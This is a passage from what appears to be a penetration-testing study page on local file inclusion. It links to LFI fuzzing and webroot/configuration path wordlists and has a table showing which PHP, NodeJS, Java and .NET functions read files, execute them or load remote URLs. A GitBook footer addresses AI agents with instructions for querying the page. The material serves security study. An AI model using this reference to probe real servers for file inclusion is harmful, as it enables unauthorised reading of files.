| | | -------------------------------------------------------------------------------------------------------------------------------------------------------- | - | | [LFI-Jhaddix.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt) | | | [Webroot path wordlist for Linux](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt) | | | [Webroot path wordlist for Windows](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt) | | | [Server configurations wordlist for Linux](https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux) | | | [Server configurations wordlist for Windows](https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Windows) | | ### File Inclusion Functions


Function	Read Content	Execute	Remote URL
PHP
`include()`/`include_once()`	Yes	Yes	Yes
`require()`/`require_once()`	Yes	Yes	No
`file_get_contents()`	Yes	No	Yes
`fopen()`/`file()`	Yes	No	No
NodeJS
`fs.readFile()`	Yes	No	No
`fs.sendFile()`	Yes	No	No
`res.render()`	Yes	Yes	No
Java
`include`	Yes	No	No
`import`	Yes	Yes	Yes
.NET
`@Html.Partial()`	Yes	No	No
`@Html.RemotePartial()`	Yes	No	Yes
`Response.WriteFile()`	Yes	No	No
`include`	Yes	Yes	Yes

--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://cyb3r.gitbook.io/pentestbook/courses/cbbh.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.